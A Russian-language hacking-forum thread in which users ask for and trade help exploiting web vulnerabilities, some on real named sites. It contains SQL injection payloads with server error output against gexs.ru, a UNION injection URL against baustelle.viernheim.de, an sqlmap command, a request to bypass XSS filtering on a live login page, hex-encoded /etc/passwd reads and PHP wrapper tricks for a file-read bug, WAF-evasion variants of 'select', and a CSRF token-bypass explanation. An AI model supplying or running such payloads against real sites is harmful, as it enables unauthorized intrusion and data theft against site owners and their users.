Как в SQLmape указать чтобы второй параметр сканился?


sqlmap -u "http://bank.ua/?xxx=123&param=xxxx&lfi=rrr" -p param

kostea
02.12.2019, 19:02
Помогите обойти фильтр и воспроизводить xss в логине

https://my.starnet.md/user/login

BabaDook
10.12.2019, 19:16
man474019 said:
↑ (https://antichat.live/posts/4350732/)
Hi all
in target blind sql injection
https://www.site.com/en/test/test12/service=(select(0)from(select(sleep(0)))v)

https://www.site.com/en/test/test12/service=(select(0)from(select(sleep(10)))v) (https://www.site.com/en/fines/test34/service=4334)
but sqlmap doesn't response (false-positive), I try some variants (--level=5 --risk=3, --tamper='between'), but no result
what can u advice or help ?
P.S I can send link in PM also if anyone wants
Thanks !


Ну, пиши свой Линк с твоей проблемой

Axiles
15.12.2019, 21:13
парни посоветуйте книги для поиска и раскрутки sql injection

trololoman96
18.12.2019, 14:51
Есть читалка через file_get_contents, предварительно фильтр регуляркой через preg_match

То что есть уязвимость уверен на 99%, т.к. это ctf машина

фильтр


Code:
.php (но в некоторых случаях пропускает, например customers/test'/a.php customers/test\a.php customers/test`a.php)
..
///

не может начинаться со слеша
не может содержать %
data://
expect://
php://
zip://
zlib://
phar://

этих враперов нету
rar://
ogg://

Знаю полный путь

Пропускает file:// но три слеша не пускает чтобы указать полный путь, какие то фильтры в этом врапере вроде нельзя использовать, по крайней мере я не нашел как

Baskin-Robbins
18.12.2019, 17:37
trololoman96 said:
↑ (https://antichat.live/posts/4352393/)
Есть читалка через file_get_contents, предварительно фильтр регуляркой через preg_match


Регистр учитывает preg_match ? если нет то можно пробовать pHp://blabla.PhP и тд

Пробовал так?

\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64

trololoman96
18.12.2019, 19:27
Baskin-Robbins said:
↑ (https://antichat.live/posts/4352425/)
Регистр учитывает preg_match ? если нет то можно пробовать pHp://blabla.PhP и тд


На регистр ему плевать


Baskin-Robbins said:
↑ (https://antichat.live/posts/4352425/)
Пробовал так?
\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64


Сейчас попробовал, такое пропускает, но говорит что нет такого файла или папки. Пробовал /etc/passwd из твоего примера и тот путь что у меня есть.

\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64 если что вставлял как есть, без каких либо дополнений

Baskin-Robbins
18.12.2019, 19:37
trololoman96 said:
↑ (https://antichat.live/posts/4352452/)
Сейчас попробовал, такое пропускает, но говорит что нет такого файла или папки. Пробовал /etc/passwd из твоего примера и тот путь что у меня есть.
\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64 если что вставлял как есть, без каких либо дополнений


ну с path traversal пробуй, возможно он рассшаривает из текущей диры, нужно выше подниматься или пробовал так?

Baskin-Robbins
18.12.2019, 19:53
еще если версия подходящая можно попробовать такое

https://habr.com/ru/post/58560/

если уязвимый код примерно такой, но это не точно


PHP:

trololoman96
18.12.2019, 20:02
Baskin-Robbins said:
↑ (https://antichat.live/posts/4352454/)
ну с path traversal пробуй, возможно он рассшаривает из текущей диры, нужно выше подниматься или пробовал так?


Пробовал, не срабатывает

Еще пробовал перевести в формат \x то что изначально было в параметре, вроде

customers.php?filename=test

customers.php?filename=\x74\x65\x73\x74

и он тоже выдает тогда что нету такого файла

это точно можно просто в параметр пихать и file_get_contents его поймет?

// Если хочешь могу дать ссылку в пм на эту ctf на root-me, и как быстро добраться до этой читалки

Baskin-Robbins
18.12.2019, 20:08
trololoman96 said:
↑ (https://antichat.live/posts/4352464/)
это точно можно просто в параметр пихать и file_get_contents его поймет?


ну создай файлик на хосте во всяком случае должен)


PHP:


а еще скинь линк на таск, поковыряюсь тоже)

trololoman96
18.12.2019, 20:21
Baskin-Robbins said:
↑ (https://antichat.live/posts/4352465/)
ну создай файлик на хосте
во всяком случае должен)

PHP:


а еще скинь линк на таск, поковыряюсь тоже)


Попробовал на виндовсе, апач, php 5.6.3 так же пишет что нет такого файла

Как добраться до читалки скинул в пм

Baskin-Robbins
18.12.2019, 20:32
trololoman96 said:
↑ (https://antichat.live/posts/4352467/)
Попробовал на виндовсе, апач, php 5.6.3 так же пишет что нет такого файла
Как добраться до читалки скинул в пм


ох уж этот виндовс)) на линь без вопросов, пых 7.3 тоже апач

trololoman96
18.12.2019, 21:44
Baskin-Robbins said:
↑ (https://antichat.live/posts/4352469/)
ох уж этот виндовс)) на линь без вопросов, пых 7.3 тоже апач


php 5.6.40 и php 7.3.6 на линуксе тоже не сработало, хз в чем дело

Axiles
20.12.2019, 13:49
Помогите раскрутить https://gexs.ru/brands/1_orange/?section_id=290

karkajoi
20.12.2019, 15:00
man474019 said:
↑ (https://antichat.live/posts/4352783/)
https://gexs.ru/brands/1_orange/?se...lue(1,concat(0x3a,(select+user()+limit+0,1)) ) (https://gexs.ru/brands/1_orange/?section_id=1+AND+extractvalue(1,concat(0x3a,(sele ct+user()+limit+0,1))))


Да только толку мало, там фильтрует по длине потом и разрывает sel ect и fr om


Code:
Запрос
https://gexs.ru/brands/1_orange/?section_id=1+AND+extractvalue(1,concat(0x3a,((sel ect+table_name+from+information_schema+tables+limi t+1,1))))



Code:
Ответ
Mysql query error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ect table_name fr om information_schema tables limit 1,1))))))

Napas
23.12.2019, 10:05
hi everyone

can i bypass http:// prefix and use wrappers or read files?


Code:
file_get_contents('http://'.$_GET["s"]);



Code:
$url = 'http://'.$_GET["s"];
...
curl_setopt($handler, CURLOPT_URL, $url);
...

crlf
23.12.2019, 10:52
Napas said:
↑ (https://antichat.live/posts/4353140/)
can i bypass
http://
prefix and use wrappers or read files?


nope

Octavian
24.12.2019, 04:26
Привет, подскажите что за обход тут

https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1

Pop-Xlop
24.12.2019, 05:18
Octavian said:
↑ (https://antichat.live/posts/4353307/)
Привет, подскажите что за обход тут
https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1


А что собственно непонятно? В данном случае CSRF токен сверял идентичность параметров в заголовке и в куках, если одинаково - значит всё как надо. Классика идёт ещё со времен "защитных" капч. Уважаю таких разработчиков.

Счастливой охоты на жуков.

Octavian
24.12.2019, 12:05
Pop-Xlop said:
↑ (https://antichat.live/posts/4353309/)
А что собственно непонятно? В данном случае CSRF токен сверял идентичность параметров в заголовке и в куках, если одинаково - значит всё как надо. Классика идёт ещё со времен "защитных" капч. Уважаю таких разработчиков.
Счастливой охоты на жуков.


Да, это понятно но как эксплуатируется такое? злоумышленник не знает что у жертвы в куках чтоб провесть CSRF

Octavian
27.12.2019, 00:18
Octavian said:
↑ (https://antichat.live/posts/4353307/)
Привет, подскажите что за обход тут
https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1


Подскажете как такое эксплуатируется?

ShpillyWilly
27.12.2019, 01:46
Octavian said:
↑ (https://antichat.live/posts/4353801/)
Подскажете как такое эксплуатируется?


ну тут все просто, тут не проверялось что именно за токен он отправляет, проверялось, что 2 токена совпадают, поэтому он просто одно и то же написал в куки и хедер, собственно все, проверка на CSRF пройдена.

Prous
21.01.2020, 20:23
Здравствуйте! Есть boolean blind sql иньекция,но WAF фильрует select и information_schema. Удалось вытащить версию mysql - 5.5.42

Пробовал обходить(аналогично с information_schema):

%53elect

sel/**/ect

SeLEcT

sel+ect

concat('sel', 'ect')

URL encode тоже пробовал,но результата нет. Есть какие нибудь идеи?

erwerr2321
21.01.2020, 20:26
/*!00000select*/

тут есть варианты

/threads/425295/ (https://antichat.live/threads/425295/)

Prous
21.01.2020, 21:06
ms13 said:
↑ (https://antichat.live/posts/4358703/)
/*!00000select*/
тут есть варианты
/threads/425295/ (https://antichat.live/threads/425295/)


не работает. waf не modsecurity,другой самопис

фильтр похоже по маске ищет select в запросе

т.е даже так sdbdnbpselect не работает

erwerr2321
21.01.2020, 21:31
ну прости, я ж не знал, шо всё так...

Prous
21.01.2020, 21:35
по хедеру узнал что waf akamai

BabaDook
22.01.2020, 01:09
Prous said:
↑ (https://antichat.live/posts/4358728/)
по хедеру узнал что waf akamai


Молодец

DezMond™
23.01.2020, 13:19
помогите ваф обойти


Code:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+